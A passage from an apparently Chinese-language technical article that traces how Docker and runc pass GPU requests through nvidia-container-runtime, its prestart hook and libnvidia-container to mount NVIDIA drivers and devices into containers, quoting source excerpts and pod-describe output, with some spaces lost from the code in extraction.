Image: nvcr.io/nvidia/cloud-native/gpu-operator-validator:v24.9.0
Image ID: nvcr.io/nvidia/cloud-native/gpu-operator-validator@sha256:70a0bd29259820d6257b04b0cdb6a175f9783d4dd19ccc4ec6599d407c359ba5
Port: <none>
Host Port: <none>
Command:
sh
-c
Args:
nvidia-validator
State: Terminated
Reason: Completed
Exit Code: 0
Started: Thu, 28 Nov 2024 21:00:55 +0800
Finished: Thu, 28 Nov 2024 21:04:41 +0800
Ready: True
Restart Count: 0
Environment:
WITH_WAIT: true
COMPONENT: driver
OPERATOR_NAMESPACE: gpu-operator (v1:metadata.namespace)
Mounts:
/host from host-root (ro)
/host-dev-char from host-dev-char (rw)
/run/nvidia/driver from driver-install-dir (rw)
/run/nvidia/validations from run-nvidia-validations (rw)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Containers:
nvidia-container-toolkit-ctr:
Container ID: containerd://c236b579e2cd400d98d7a34fb9e4b9037322ad620445da3f1fc91518142ba615
Image: nvcr.io/nvidia/k8s/container-toolkit:v1.17.0-ubuntu20.04
Image ID: nvcr.io/nvidia/k8s/container-toolkit@sha256:c458c33da393dda19e53dae4cb82f02203714ce0f5358583bf329f3693ec84cb
Port: <none>
Host Port: <none>
Command:
/bin/bash
-c
Args:
/bin/entrypoint.sh
State: Running
Started: Thu, 28 Nov 2024 21:04:54 +0800
Ready: True
Restart Count: 0
Environment:
...
Mounts:
/bin/entrypoint.sh from nvidia-container-toolkit-entrypoint (ro,path="entrypoint.sh")
/driver-root from driver-install-dir (rw)
/host from host-root (ro)
/run/nvidia/toolkit from toolkit-root (rw)
/run/nvidia/validations from run-nvidia-validations (rw)
/runtime/config-dir/ from containerd-config (rw)
/runtime/sock-dir/ from containerd-socket (rw)
/usr/local/nvidia from toolkit-install-dir (rw)
/usr/share/containers/oci/hooks.d from crio-hooks (rw)
/var/run/cdi from cdi-root (rw)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Conditions:
...
Volumes:
nvidia-container-toolkit-entrypoint:
Type: ConfigMap (a volume populated by a ConfigMap)
Name: nvidia-container-toolkit-entrypoint
Optional: false
toolkit-root:
Type: HostPath (bare host directory volume)
Path: /run/nvidia/toolkit
HostPathType: DirectoryOrCreate
run-nvidia-validations:
Type: HostPath (bare host directory volume)
Path: /run/nvidia/validations
HostPathType: DirectoryOrCreate
driver-install-dir:
Type: HostPath (bare host directory volume)
Path: /run/nvidia/driver
HostPathType: DirectoryOrCreate
host-root:
Type: HostPath (bare host directory volume)
Path: /
HostPathType:
toolkit-install-dir:
Type: HostPath (bare host directory volume)
Path: /usr/local/nvidia
HostPathType:
crio-hooks:
Type: HostPath (bare host directory volume)
Path: /run/containers/oci/hooks.d
HostPathType:
host-dev-char:
Type: HostPath (bare host directory volume)
Path: /dev/char
HostPathType:
cdi-root:
Type: HostPath (bare host directory volume)
Path: /var/run/cdi
HostPathType: DirectoryOrCreate
containerd-config:
Type: HostPath (bare host directory volume)
Path: /etc/containerd
HostPathType: DirectoryOrCreate
containerd-socket:
Type: HostPath (bare host directory volume)
Path: /run/containerd
HostPathType:
...
在启动gpu容器前监听进程,验证发现仍通过 nvidia-container-toolkit 来实现。
root@wanglei-k8s-gpu-02862:~# while true; do ps -ef |grep nvidia-container-cli|grep -v grep; done
root 91175 91173 0 21:04 ? 00:00:00 /bin/sh /usr/local/nvidia/toolkit/nvidia-container-cli --root=/run/nvidia/driver --load-kmods configure --ldconfig=@/run/nvidia/driver/sbin/ldconfig.real --device=GPU-1401ffea-de99-b446-2a8c-15e0797f35bb --compat32 --compute --display --graphics --ngx --utility --video --pid=91165 /mnt/paas/runtime/overlay2/332208ab1f6248114caa9ed78edfcfe09cee0ecf6939e46c942b1e4394df65da/merged
2. 调用链分析
-
nvidia-container-cli(https://github.com/NVIDIA/libnvidia-container/tree/main/src/cli) -
libnvidia-container(https://github.com/NVIDIA/libnvidia-container)
2.1 docker-cli --gpus 传递至 docker daemon
docker run 和 docker create 命令提供了 --gpus 参数,用于指定要传递给容器的 gpu 设备, 下面以 docker create
命令为例分析调用链。
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L79
func NewCreateCommand(dockerCli command.Cli) *cobra.Command {
...
cmd := &cobra.Command{
Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
Short: "Create a new container",
...
}
...
copts = addFlags(flags)
...
}
通过指定 --gpus
参数,设置到 hostConfig 中传递至 docker daemon 。
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L190
func addFlags(flags *pflag.FlagSet) *containerOptions {
copts := &containerOptions{
...
gpus opts.GpuOpts
...
}
...
flags.Var(&copts.gpus, "gpus", "GPU devices to add to the container ('all' to pass all GPUs)")
...
}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L593
func parse(flags *pflag.FlagSet, copts *containerOptions, serverOS string) (*containerConfig, error) {
...
deviceRequests := copts.gpus.Value()
iflen(cdiDeviceNames) > 0 {
cdiDeviceRequest := container.DeviceRequest{
Driver: "cdi",
DeviceIDs: cdiDeviceNames,
}
deviceRequests = append(deviceRequests, cdiDeviceRequest)
}
resources := container.Resources{
...
DeviceRequests: deviceRequests,
}
...
hostConfig := &container.HostConfig{
...
Resources: resources,
...
}
...
return &containerConfig{
Config: config,
HostConfig: hostConfig,
NetworkingConfig: networkingConfig,
}, nil
}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L265C2-L265C120
func runCreate(ctx context.Context, dockerCli command.Cli, flags *pflag.FlagSet, options *createOptions, copts *containerOptions) error {
...
containerCfg, err := parse(flags, copts, dockerCli.ServerInfo().OSType)
...
id, err := createContainer(ctx, dockerCli, containerCfg, options)
...
}
func createContainer(ctx context.Context, dockerCli command.Cli, containerCfg *containerConfig, options *createOptions) (containerID string, err error) {
...
response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, platform, options.name)
...
}
2.2 docker daemon 创建 spec
在容器启动时,创建 spec,设置 prestart hook 配置。
https://github.com/moby/moby/blob/v27.1.0/daemon/start.go#L143C2-L143C65
func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
...
return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true)
}
func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
...
spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts)
...
}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L1042
func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, err error) {
...
opts = append(opts,
...
WithDevices(daemon, c),
...
)
...
}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L934-L938
func WithDevices(daemon *Daemon, c *container.Container) coci.SpecOpts {
return func(ctx context.Context, _ coci.Client, _ *containers.Container, s *coci.Spec) error {
...
for _, req := range c.HostConfig.DeviceRequests {
if err := daemon.handleDevice(req, s); err != nil {
return err
}
}
...
}
}
https://github.com/moby/moby/blob/v27.1.0/daemon/devices.go#L29
func (daemon *Daemon) handleDevice(req container.DeviceRequest, spec *specs.Spec) error {
if req.Driver == "" {
for _, dd := range deviceDrivers {
if selected := dd.capset.Match(req.Capabilities); selected != nil {
return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
}
}
} elseif dd := deviceDrivers[req.Driver]; dd != nil {
if req.Driver == "cdi" {
return dd.updateSpec(spec, &deviceInstance{req: req})
}
if selected := dd.capset.Match(req.Capabilities); selected != nil {
return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
}
}
return incompatibleDeviceRequest{req.Driver, req.Capabilities}
}
https://github.com/moby/moby/blob/v27.1.0/daemon/nvidia_linux.go#L92-L99
const nvidiaHook = "nvidia-container-runtime-hook"
func init() {
if _, err := exec.LookPath(nvidiaHook); err != nil {
// do not register Nvidia driver if helper binary is not present.
return
}
capset := capabilities.Set{"gpu": struct{}{}, "nvidia": struct{}{}}
nvidiaDriver := &deviceDriver{
capset: capset,
updateSpec: setNvidiaGPUs,
}
for c := range allNvidiaCaps {
nvidiaDriver.capset[string(c)] = struct{}{}
}
registerDeviceDriver("nvidia", nvidiaDriver)
}
func setNvidiaGPUs(s *specs.Spec, dev *deviceInstance) error {
req := dev.req
if req.Count != 0 && len(req.DeviceIDs) > 0 {
return errConflictCountDeviceIDs
}
iflen(req.DeviceIDs) > 0 {
s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+strings.Join(req.DeviceIDs, ","))
} elseif req.Count > 0 {
s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+countToDevices(req.Count))
} elseif req.Count < 0 {
s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES=all")
}
var nvidiaCaps []string
// req.Capabilities contains device capabilities, some but not all are NVIDIA driver capabilities.
for _, c := range dev.selectedCaps {
nvcap := nvidia.Capability(c)
if _, isNvidiaCap := allNvidiaCaps[nvcap]; isNvidiaCap {
nvidiaCaps = append(nvidiaCaps, c)
continue
}
// TODO: nvidia.WithRequiredCUDAVersion
// for now we let the prestart hook verify cuda versions but errors are not pretty.
}
if nvidiaCaps != nil {
s.Process.Env = append(s.Process.Env, "NVIDIA_DRIVER_CAPABILITIES="+strings.Join(nvidiaCaps, ","))
}
path, err := exec.LookPath(nvidiaHook)
if err != nil {
return err
}
if s.Hooks == nil {
s.Hooks = &specs.Hooks{}
}
// This implementation uses prestart hooks, which are deprecated.
// CreateRuntime is the closest equivalent, and executed in the same
// locations as prestart-hooks, but depending on what these hooks do,
// possibly one of the other hooks could be used instead (such as
// CreateContainer or StartContainer).
s.Hooks.Prestart = append(s.Hooks.Prestart, specs.Hook{ //nolint:staticcheck // FIXME(thaJeztah); replace prestart hook with a non-deprecated one.
Path: path,
Args: []string{
nvidiaHook,
"prestart",
},
Env: os.Environ(),
})
returnnil
}
docker 设置完 spec 后,将启动runtime。
2.3 nvidia-container-runtime 调用 runc
nvidia-container-toolkit 在安装时会将 runtime 设置为 nvidia-container-runtime。
nvidia-container-runtime 作为一层shim, 将会把docker传递过来的spec配置透传给更底层的runtime,通常默认是runc。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/config/config.go#L110
func GetDefault() (*Config, error) {
d := Config{
...
NVIDIAContainerRuntimeConfig: RuntimeConfig{
...
Runtimes: []string{"docker-runc", "runc", "crun"},
...
},
...
}
...
}
那么 nvidia-container-runtime 存在的意义是什么呢,主要是为了修改 spec,这实际上和 docker 前面修改的 prestart hooks 有一些冗余,不过 nvidia-container-runtime 会修改更多内容。
下面我们来跟踪完整的 nvidia-container-runtime 调用链。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime/main.go#L11
func main() {
r := runtime.New()
err := r.Run(os.Args)
if err != nil {
os.Exit(1)
}
}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime.go#L82
func (r rt) Run(argv []string) (rerr error) {
...
runtime, err := newNVIDIAContainerRuntime(r.logger, cfg, argv, driver)
...
return runtime.Exec(argv)
}
-
如果执行的命令不是create,则直接调用 runc -
如果执行create命令,则修改spec, 修改包括 modeModifier, graphicsModifier, featureModifie
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L49
func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
...
if !oci.HasCreateSubcommand(argv) {
logger.Tracef("Skipping modifier for non-create subcommand")
return lowLevelRuntime, nil
}
ociSpec, err := oci.NewSpec(logger, argv)
...
specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
...
// Create the wrapping runtime with the specified modifier.
r := oci.NewModifyingRuntimeWrapper(
logger,
lowLevelRuntime,
ociSpec,
specModifier,
)
return r, nil
}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/oci/runtime_modifier.go#L56
func (r *modifyingRuntimeWrapper) Exec(args []string) error {
if HasCreateSubcommand(args) {
r.logger.Debugf("Create command detected; applying OCI specification modifications")
err := r.modify()
if err != nil {
return fmt.Errorf("could not apply required modification to OCI specification: %w", err)
}
r.logger.Debugf("Applied required modification to OCI specification")
}
r.logger.Debugf("Forwarding command to runtime %v", r.runtime.String())
return r.runtime.Exec(args)
}
2.4 nvidia-container-runtime 具体会对 spec 修改什么
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L66 7
// newSpecModifier is a factory method that creates constructs an OCI spec modifer based on the provided config.
func newSpecModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec, driver *root.Driver) (oci.SpecModifier, error) {
rawSpec, err := ociSpec.Load()
if err != nil {
returnnil, fmt.Errorf("failed to load OCI spec: %v", err)
}
image, err := image.NewCUDAImageFromSpec(rawSpec)
if err != nil {
returnnil, err
}
mode := info.ResolveAutoMode(logger, cfg.NVIDIAContainerRuntimeConfig.Mode, image)
modeModifier, err := newModeModifier(logger, mode, cfg, ociSpec, image)
if err != nil {
returnnil, err
}
// For CDI mode we make no additional modifications.
if mode == "cdi" {
return modeModifier, nil
}
graphicsModifier, err := modifier.NewGraphicsModifier(logger, cfg, image, driver)
if err != nil {
returnnil, err
}
featureModifier, err := modifier.NewFeatureGatedModifier(logger, cfg, image)
if err != nil {
returnnil, err
}
modifiers := modifier.Merge(
modeModifier,
graphicsModifier,
featureModifier,
)
return modifiers, nil
}
modeModifier 有3种。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L105
func newModeModifier(logger logger.Interface, mode string, cfg *config.Config, ociSpec oci.Spec, image image.CUDA) (oci.SpecModifier, error) {
switch mode {
case"legacy":
return modifier.NewStableRuntimeModifier(logger, cfg.NVIDIAContainerRuntimeHookConfig.Path), nil
case"csv":
return modifier.NewCSVModifier(logger, cfg, image)
case"cdi":
return modifier.NewCDIModifier(logger, cfg, ociSpec)
}
returnnil, fmt.Errorf("invalid runtime mode: %v", cfg.NVIDIAContainerRuntimeConfig.Mode)
}
如果 mode 为 cdi, 则仅执行 modeModifier 。CDIModifiler 负责修改 spec中的hooks, devices,mounts 配置(这些配置已在/etc/cdi/nvidia.yaml
中声明)。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/cdi.go#L37
func NewCDIModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec) (oci.SpecModifier, error) {
devices, err := getDevicesFromSpec(logger, ociSpec, cfg)
if err != nil {
returnnil, fmt.Errorf("failed to get required devices from OCI specification: %v", err)
}
iflen(devices) == 0 {
logger.Debugf("No devices requested; no modification required.")
returnnil, nil
}
logger.Debugf("Creating CDI modifier for devices: %v", devices)
automaticDevices := filterAutomaticDevices(devices)
iflen(automaticDevices) != len(devices) && len(automaticDevices) > 0 {
returnnil, fmt.Errorf("requesting a CDI device with vendor 'runtime.nvidia.com' is not supported when requesting other CDI devices")
}
iflen(automaticDevices) > 0 {
automaticModifier, err := newAutomaticCDISpecModifier(logger, cfg, automaticDevices)
if err == nil {
return automaticModifier, nil
}
logger.Warningf("Failed to create the automatic CDI modifier: %w", err)
logger.Debugf("Falling back to the standard CDI modifier")
}
return cdi.New(
cdi.WithLogger(logger),
cdi.WithDevices(devices...),
cdi.WithSpecDirs(cfg.NVIDIAContainerRuntimeConfig.Modes.CDI.SpecDirs...),
)
}
LegacyModifier 会修改 runc prestart hook
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/stable.go#L33
func NewStableRuntimeModifier(logger logger.Interface, nvidiaContainerRuntimeHookPath string) oci.SpecModifier {
m := stableRuntimeModifier{
logger: logger,
nvidiaContainerRuntimeHookPath: nvidiaContainerRuntimeHookPath,
}
return &m
}
CSVModifier 支持通过csv文件主动提供设备的具体配置,与CDI模式类似,直接修改 oci spec 中的 devices 配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/csv.go#L42
func NewCSVModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
logger.Infof("No modification required; no devices requested")
returnnil, nil
}
logger.Infof("Constructing modifier from config: %+v", *cfg)
if err := checkRequirements(logger, image); err != nil {
returnnil, fmt.Errorf("requirements not met: %v", err)
}
csvFiles, err := csv.GetFileList(cfg.NVIDIAContainerRuntimeConfig.Modes.CSV.MountSpecPath)
if err != nil {
returnnil, fmt.Errorf("failed to get list of CSV files: %v", err)
}
if image.Getenv(nvidiaRequireJetpackEnvvar) != "csv-mounts=all" {
csvFiles = csv.BaseFilesOnly(csvFiles)
}
cdilib, err := nvcdi.New(
nvcdi.WithLogger(logger),
nvcdi.WithDriverRoot(cfg.NVIDIAContainerCLIConfig.Root),
nvcdi.WithNVIDIACDIHookPath(cfg.NVIDIACTKConfig.Path),
nvcdi.WithMode(nvcdi.ModeCSV),
nvcdi.WithCSVFiles(csvFiles),
)
if err != nil {
returnnil, fmt.Errorf("failed to construct CDI library: %v", err)
}
spec, err := cdilib.GetSpec()
if err != nil {
returnnil, fmt.Errorf("failed to get CDI spec: %v", err)
}
cdiModifier, err := cdi.New(
cdi.WithLogger(logger),
cdi.WithSpec(spec.Raw()),
)
if err != nil {
returnnil, fmt.Errorf("failed to construct CDI modifier: %v", err)
}
modifiers := Merge(
nvidiaContainerRuntimeHookRemover{logger},
cdiModifier,
)
return modifiers, nil
}
GraphicsModifier
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/graphics.go#L32
func NewGraphicsModifier(logger logger.Interface, cfg *config.Config, image image.CUDA, driver *root.Driver) (oci.SpecModifier, error) {
if required, reason := requiresGraphicsModifier(image); !required {
logger.Infof("No graphics modifier required: %v", reason)
returnnil, nil
}
nvidiaCDIHookPath := cfg.NVIDIACTKConfig.Path
mounts, err := discover.NewGraphicsMountsDiscoverer(
logger,
driver,
nvidiaCDIHookPath,
)
if err != nil {
returnnil, fmt.Errorf("failed to create mounts discoverer: %v", err)
}
// In standard usage, the devRoot is the same as the driver.Root.
devRoot := driver.Root
drmNodes, err := discover.NewDRMNodesDiscoverer(
logger,
image.DevicesFromEnvvars(visibleDevicesEnvvar),
devRoot,
nvidiaCDIHookPath,
)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer: %v", err)
}
d := discover.Merge(
drmNodes,
mounts,
)
return NewModifierFromDiscoverer(logger, d)
}
FeatureGatedModifier 根据配置中的开关,修改 oci中的设备和挂载配置。如启用相关特性,则新增对应的设备或挂载配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/gated.go#L38
// NewFeatureGatedModifier creates the modifiers for optional features.
// These include:
//
// NVIDIA_GDS=enabled
// NVIDIA_MOFED=enabled
// NVIDIA_NVSWITCH=enabled
// NVIDIA_GDRCOPY=enabled
//
// If not devices are selected, no changes are made.
func NewFeatureGatedModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
logger.Infof("No modification required; no devices requested")
returnnil, nil
}
var discoverers []discover.Discover
driverRoot := cfg.NVIDIAContainerCLIConfig.Root
devRoot := cfg.NVIDIAContainerCLIConfig.Root
if cfg.Features.IsEnabled(config.FeatureGDS, image) {
d, err := discover.NewGDSDiscoverer(logger, driverRoot, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for GDS devices: %w", err)
}
discoverers = append(discoverers, d)
}
if cfg.Features.IsEnabled(config.FeatureMOFED, image) {
d, err := discover.NewMOFEDDiscoverer(logger, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for MOFED devices: %w", err)
}
discoverers = append(discoverers, d)
}
if cfg.Features.IsEnabled(config.FeatureNVSWITCH, image) {
d, err := discover.NewNvSwitchDiscoverer(logger, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for NVSWITCH devices: %w", err)
}
discoverers = append(discoverers, d)
}
if cfg.Features.IsEnabled(config.FeatureGDRCopy, image) {
d, err := discover.NewGDRCopyDiscoverer(logger, devRoot)
if err != nil {
returnnil, fmt.Errorf("failed to construct discoverer for GDRCopy devices: %w", err)
}
discoverers = append(discoverers, d)
}
return NewModifierFromDiscoverer(logger, discover.Merge(discoverers...))
}
2.5 runc 在 prestart hook 阶段调用 nvidia-container-runtime-hook
https://github.com/opencontainers/runc/blob/v1.1.13/libcontainer/process_linux.go#L462
func (p *initProcess) start() (retErr error) {
...
ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {
switch sync.Type {
case procSeccomp:
...
case procReady:
...
if err := hooks[configs.Prestart].RunHooks(s); err != nil {
return err
}
...
case procHooks:
...
if err := hooks[configs.Prestart].RunHooks(s); err != nil {
return err
}
...
default:
...
}
}
...
}
2.6 nvidia-container-runtime-hook 调用 nvidia-container-cli
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L179
func main() {
...
switch args[0] {
case"prestart":
doPrestart()
os.Exit(0)
case"poststart":
fallthrough
case"poststop":
os.Exit(0)
default:
flag.Usage()
os.Exit(2)
}
}
执行 nvidia-container-cli 的 configure 命令。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L149
func doPrestart() {
...
args := []string{getCLIPath(cli)}
...
args = append(args, "configure")
...
err = syscall.Exec(args[0], args, env)
...
}
2.7 nvidia-container-cli 调用 libnvidia-container
nvidia-container-cli 做了一个转换,把 libnvidia-container 中函数的 nvc_xxx 前缀移除了, 改为通过 libnvc.xxx 的形式调用。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/main.c#L140
int
main(int argc, char *argv[])
{
...
if ((rv = load_libnvc()) != 0)
goto fail;
...
}
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/libnvc.c#L137
int
load_libnvc(void)
{
if (is_tegra() && !nvml_available())
return load_libnvc_v0();
return load_libnvc_v1();
}
...
static int
load_libnvc_v1(void)
{
#define load_libnvc_func(func)
libnvc.func = nvc_##func
load_libnvc_func(config_free);
...
}
nvidia-container-cli configure 会执行很多 mount 操作。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/configure.c#L376-L433
int
configure_command(const struct context *ctx)
{
...
if (libnvc.driver_mount(nvc, cnt, drv) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
for (size_t i = 0; i < devices.ngpus; ++i) {
if (libnvc.device_mount(nvc, cnt, devices.gpus[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
if (!mig_config_devices.all && !mig_monitor_devices.all) {
for (size_t i = 0; i < devices.nmigs; ++i) {
if (libnvc.mig_device_access_caps_mount(nvc, cnt, devices.migs[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
}
if (mig_config_devices.all && mig_config_devices.ngpus) {
if (libnvc.mig_config_global_caps_mount(nvc, cnt) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
for (size_t i = 0; i < mig_config_devices.ngpus; ++i) {
if (libnvc.device_mig_caps_mount(nvc, cnt, mig_config_devices.gpus[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
}
if (mig_monitor_devices.all && mig_monitor_devices.ngpus) {
if (libnvc.mig_monitor_global_caps_mount(nvc, cnt) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
for (size_t i = 0; i < mig_monitor_devices.ngpus; ++i) {
if (libnvc.device_mig_caps_mount(nvc, cnt, mig_monitor_devices.gpus[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
}
for (size_t i = 0; i < nvc_cfg->imex.nchans; ++i) {
if (libnvc.imex_channel_mount(nvc, cnt, &nvc_cfg->imex.chans[i]) < 0) {
warnx("mount error: %s", libnvc.error(nvc));
goto fail;
}
}
...
if (libnvc.ldcache_update(nvc, cnt) < 0) {
warnx("ldcache error: %s", libnvc.error(nvc));
goto fail;
}
...
}
2.8 libnvidia-container nvc_driver_mount 函数挂载相关文件
nvc_driver_mount() 挂载:
-
procfs: 将主机 /proc/driver/nvidia
下的相关文件挂载至容器内 -
app_profile: 将主机 /etc/nvidia/nvidia-application-profiles-rc.d
相关的配置文件挂载至容器内 -
Host binary and library: 将主机 二进制程序、依赖库 挂载至容器内 -
Container library mounts: 为了实现前向兼容,用户可以提供更新版本的cuda库,将容器/usr/local/cuda/compat目录下较新的CUDA库,挂载到容器 lib 目录。 -
Firmware: 将主机 /lib/firmware/nvidia
下的相关文件挂载至容器内 -
IPC: 将主机 /var/run/nvidia-persistenced/socket
下的相关文件挂载至容器内 -
Device: 将主机 /dev/nvidia-uvm
,/dev/nvidia-uvm-tools
下的相关文件挂载至容器内
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L712
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
...
if (ns_enter(&ctx->err, cnt->mnt_ns, CLONE_NEWNS) < 0)
return (-1);
...
/* Procfs mount */
if (ctx->dxcore.initialized)
log_warn("skipping procfs mount on WSL");
elseif ((*ptr++ = mount_procfs(&ctx->err, ctx->cfg.root, cnt)) == NULL)
goto fail;
/* Application profile mount */
if (cnt->flags & OPT_GRAPHICS_LIBS) {
if (ctx->dxcore.initialized)
log_warn("skipping app profile mount on WSL");
elseif ((*ptr++ = mount_app_profile(&ctx->err, cnt)) == NULL)
goto fail;
}
/* Host binary and library mounts */
if (info->bins != NULL && info->nbins > 0) {
if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.bins_dir, info->bins, info->nbins)) == NULL)
goto fail;
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
}
if (info->libs != NULL && info->nlibs > 0) {
if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs_dir, info->libs, info->nlibs)) == NULL)
goto fail;
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
}
if ((cnt->flags & OPT_COMPAT32) && info->libs32 != NULL && info->nlibs32 > 0) {
if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs32_dir, info->libs32, info->nlibs32)) == NULL)
goto fail;
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
}
if (symlink_libraries(&ctx->err, cnt, mnt, (size_t)(ptr - mnt)) < 0)
goto fail;
/* Container library mounts */
if (cnt->libs != NULL && cnt->nlibs > 0) {
size_t nlibs = cnt->nlibs;
char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs);
if (libs == NULL)
goto fail;
filter_libraries(info, libs, &nlibs);
if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
free(libs);
goto fail;
}
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
free(libs);
}
/* Firmware mounts */
for (size_t i = 0; i < info->nfirmwares; ++i) {
if ((*ptr++ = mount_firmware(&ctx->err, ctx->cfg.root, cnt, info->firmwares[i])) == NULL) {
log_errf("error mounting firmware path %s", info->firmwares[i]);
goto fail;
}
}
/* IPC mounts */
for (size_t i = 0; i < info->nipcs; ++i) {
/* XXX Only utility libraries require persistenced or fabricmanager IPC, everything else is compute only. */
if (str_has_suffix(NV_PERSISTENCED_SOCKET, info->ipcs[i]) || str_has_suffix(NV_FABRICMANAGER_SOCKET, info->ipcs[i])) {
if (!(cnt->flags & OPT_UTILITY_LIBS))
continue;
} elseif (!(cnt->flags & OPT_COMPUTE_LIBS))
continue;
if ((*ptr++ = mount_ipc(&ctx->err, ctx->cfg.root, cnt, info->ipcs[i])) == NULL)
goto fail;
}
/* Device mounts */
for (size_t i = 0; i < info->ndevs; ++i) {
/* On WSL2 we only mount the /dev/dxg device and as such these checks are not applicable. */
if (!ctx->dxcore.initialized) {
/* XXX Only compute libraries require specific devices (e.g. UVM). */
if (!(cnt->flags & OPT_COMPUTE_LIBS) && major(info->devs[i].id) != NV_DEVICE_MAJOR)
continue;
/* XXX Only display capability requires the modeset device. */
if (!(cnt->flags & OPT_DISPLAY) && minor(info->devs[i].id) == NV_MODESET_DEVICE_MINOR)
continue;
}
if (!(cnt->flags & OPT_NO_DEVBIND)) {
if ((*ptr++ = mount_device(&ctx->err, ctx->cfg.root, cnt, &info->devs[i])) == NULL)
goto fail;
}
if (!(cnt->flags & OPT_NO_CGROUPS)) {
if (setup_device_cgroup(&ctx->err, cnt, info->devs[i].id) < 0)
goto fail;
}
}
rv = 0;
fail:
if (rv < 0) {
for (size_t i = 0; mnt != NULL && i < nmnt; ++i)
unmount(mnt[i]);
assert_func(ns_enter_at(NULL, ctx->mnt_ns, CLONE_NEWNS));
} else {
rv = ns_enter_at(&ctx->err, ctx->mnt_ns, CLONE_NEWNS);
}
array_free((char **)mnt, nmnt);
return (rv);
}
2.9 挂载容器 cuda 库文件
重点分析从容器挂载到容器的操作,即cuda前向兼容特性。
